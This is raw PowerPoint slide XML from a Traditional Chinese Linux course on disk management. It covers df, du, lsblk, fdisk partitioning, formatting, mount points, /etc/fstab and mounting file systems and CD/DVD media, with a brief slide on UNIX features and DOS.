              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>察看硬碟空間使用量的指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：列出所有檔案系統</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>連同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>partition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>都列出</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：以人們較容易閱讀的方式顯示。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3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914400" y="1574640"/>
              <a:ext cx="559080" cy="702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98560" y="1511280"/>
                <a:ext cx="59076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1009800" y="2685960"/>
              <a:ext cx="5550120" cy="2098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93600" y="2622600"/>
                <a:ext cx="5582160" cy="33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1149480" y="3054240"/>
              <a:ext cx="5937480" cy="228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33640" y="2990880"/>
                <a:ext cx="596916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1828800" y="419040"/>
              <a:ext cx="5436000" cy="3052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812960" y="355680"/>
                <a:ext cx="5467680" cy="43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7263000" y="4813560"/>
              <a:ext cx="684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247160" y="4750200"/>
                <a:ext cx="385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1613160" y="1593720"/>
              <a:ext cx="5695920" cy="3531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597320" y="1530000"/>
                <a:ext cx="5727600" cy="48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8771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sz="4000" dirty="0" smtClean="0"/>
              <a:t>du</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>：察看目錄內所有檔案使用量</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="61.jp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 l="4145" t="48442" r="13703"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="3572910"/>
            <a:ext cx="8496944" cy="3285090"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="內容版面配置區 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1266825"/>
            <a:ext cx="8229600" cy="485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3400" dirty="0" smtClean="0"/>
              <a:t>du</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>察看目錄內所有檔案使用量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：列出所有檔案系統</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>/*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> ：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>列出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>總量，不列個別目錄容量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h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：以人們較容易閱讀的方式顯示。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3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073160" y="654120"/>
              <a:ext cx="483120" cy="255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57320" y="590400"/>
                <a:ext cx="5148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914400" y="1600200"/>
              <a:ext cx="5747040" cy="2224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98560" y="1536840"/>
                <a:ext cx="5778720" cy="34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4730760" y="641520"/>
              <a:ext cx="3010320" cy="216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714920" y="577800"/>
                <a:ext cx="3042000" cy="34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1371600" y="2241720"/>
              <a:ext cx="432000" cy="129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355760" y="2178000"/>
                <a:ext cx="4640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2279520" y="2228760"/>
              <a:ext cx="2534040" cy="1591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263680" y="2165400"/>
                <a:ext cx="2565720" cy="28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314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內容版面配置區 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1196751"/>
            <a:ext cx="8229600" cy="5404073"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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磁碟管理非常重要，故新增硬碟時，必須完成以下步驟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</a:p>
          <a:p>
            <a:pPr lvl="0"/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對磁碟進行分割，以建立可用的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partition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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>磁區分割建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>類型。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>順序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>:P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>主要分割 → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>E:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>延伸分割→</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>L:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>邏輯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>分割</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:latin typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p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對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partition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進行格式化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format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，建立可用的檔案系統。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/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對剛建立好的檔案系統進行檢驗。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" kern="1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sz="4000" dirty="0" smtClean="0"/>
              <a:t>磁碟分割、格式化、檢驗與掛載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2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645920" y="3468240"/>
              <a:ext cx="6322680" cy="720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30080" y="3404520"/>
                <a:ext cx="6354360" cy="19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4882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UNIX</a:t>
            </a:r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的特色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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>穩定性高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移植性高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多人多工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安全性佳</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系統架構良好</a:t>
            </a:r>
          </a:p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8093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內容版面配置區 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1196751"/>
            <a:ext cx="8229600" cy="5404073"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/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建立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掛載點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並</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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完成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掛</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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載</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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kern="12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dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>建立掛載點</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>mnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>目錄下建立使用磁區</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t> →再使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>mount–a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>掛載</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>fstab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>所設定 需要掛載的掛載</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>點</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>如下圖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:latin typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" kern="1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sz="4000" dirty="0" smtClean="0"/>
              <a:t>磁碟分割、格式化、檢驗與掛載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0</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="圖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1331640" y="3212976"/>
            <a:ext cx="6696744" cy="316835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2534400" y="2455920"/>
              <a:ext cx="4023720" cy="396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18200" y="2392200"/>
                <a:ext cx="4055760" cy="166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35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sz="4000" dirty="0" smtClean="0"/>
              <a:t>磁碟分割、格式化、檢驗與掛載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1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="內容版面配置區 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581123" y="1199143"/>
            <a:ext cx="8229600" cy="5401682"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>fstab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>內容介紹</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>系統進行開機時必須</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>掛載的掛載</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>點。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="圖片 26"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1174680" y="2276872"/>
            <a:ext cx="6966360" cy="4000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83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查看磁碟列表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>lsblk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> 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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>列出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>系統上的所有磁碟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>列表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>諧音</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>:ls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>block</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US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2295747"/>
            <a:ext cx="7530743" cy="4162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38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查看磁碟列表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>lsblk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> 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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>lsblk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>列出系統上的所有磁碟列表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>新增硬碟到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>後，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>lsblk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>看磁碟列表查看發現新增</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>sdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>設備。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="圖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971600" y="2731110"/>
            <a:ext cx="7416824" cy="3320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1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： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>fdisk</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="65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51520" y="1340768"/>
            <a:ext cx="8748464" cy="4828387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2679840" y="615960"/>
              <a:ext cx="1918080" cy="576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64000" y="552600"/>
                <a:ext cx="194976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5448240" y="635040"/>
              <a:ext cx="1511640" cy="828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432400" y="571320"/>
                <a:ext cx="1543320" cy="21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8345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： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>fdisk</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="66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95536" y="1340767"/>
            <a:ext cx="8496944" cy="4465547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104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： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>fdisk</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="67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51520" y="1556792"/>
            <a:ext cx="8640960" cy="4045040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16202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格式化</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="68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331640" y="1340768"/>
            <a:ext cx="6336704" cy="4843131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3232080" y="603360"/>
              <a:ext cx="2984760" cy="1144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16240" y="539640"/>
                <a:ext cx="30168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1378080" y="1339920"/>
              <a:ext cx="540000" cy="320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62240" y="1276200"/>
                <a:ext cx="5716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2451240" y="2622600"/>
              <a:ext cx="1498680" cy="892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435400" y="2558880"/>
                <a:ext cx="153036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3244680" y="2610000"/>
              <a:ext cx="991080" cy="828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228840" y="2546280"/>
                <a:ext cx="1022760" cy="209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383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格式化</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="69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67544" y="1412775"/>
            <a:ext cx="8424936" cy="4154365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774720" y="1498680"/>
              <a:ext cx="628920" cy="194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8880" y="1434960"/>
                <a:ext cx="66060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3384720" y="533520"/>
              <a:ext cx="2006640" cy="572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368520" y="469800"/>
                <a:ext cx="2039040" cy="18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0546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掛載與卸載</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="7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259632" y="1196752"/>
            <a:ext cx="6552728" cy="5069994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3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2317680" y="1428840"/>
              <a:ext cx="1105200" cy="64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01840" y="1365120"/>
                <a:ext cx="11368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2711520" y="647640"/>
              <a:ext cx="3626280" cy="702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95680" y="584280"/>
                <a:ext cx="3657960" cy="197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3642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DOS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dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOS是早期IBM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PC的磁帶作業系統</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Disk Operation System)，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>由於PC的服務對象為ㄧ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>般的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>單一使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，因此，在CPU及主記憶體方面的管理需求不多，反而是需要對於磁碟提供較多的管理，引此命名為DOS。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just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963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掛載</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Ext2/Ext3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案系統</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="7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23527" y="1844824"/>
            <a:ext cx="8560845" cy="2376264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784520" y="539640"/>
              <a:ext cx="5511960" cy="1846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68320" y="476280"/>
                <a:ext cx="554400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3664080" y="2247840"/>
              <a:ext cx="2654640" cy="320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48240" y="2184480"/>
                <a:ext cx="2686320" cy="15912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文字方塊 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499992" y="2420888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建立掛載點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55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掛載 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>CD 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DVD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
